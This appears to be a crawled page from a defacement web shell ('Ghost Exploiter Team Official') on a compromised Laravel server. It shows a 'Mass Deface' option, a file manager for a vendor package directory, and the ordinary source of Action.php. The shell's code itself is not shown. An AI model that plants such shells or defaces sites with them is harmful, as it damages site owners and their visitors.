Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
safemood
/
laravel-workflow
/
src
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
Commands
--
ren
Contracts
--
ren
DTO
--
ren
Enums
--
ren
Traits
--
ren
Action.php
0.999KB
edt
ren
WorkflowManager.php
0.353KB
edt
ren
WorkflowServiceProvider
...
0.59KB
edt
ren
<?php namespace Safemood\Workflow; use Safemood\Workflow\Contracts\DTOInterface; use Safemood\Workflow\Enums\ActionState; abstract class Action { private $state; private $exception; /** * Handle the action. * * @param DTOInterface $context The context data passed through the workflow. * @return void */ abstract public function handle(DTOInterface &$context); /** * Get the state of the action. */ public function getState(): ?ActionState { return $this->state; } /** * Set the state of the action. */ public function setState(ActionState $state): void { $this->state = $state; } /** * Get the exception of the action. */ public function getException(): ?\Exception { return $this->exception; } /** * Set the exception of the action. */ public function setException(?\Exception $exception): void { $this->exception = $exception; } }
<=Back
Liking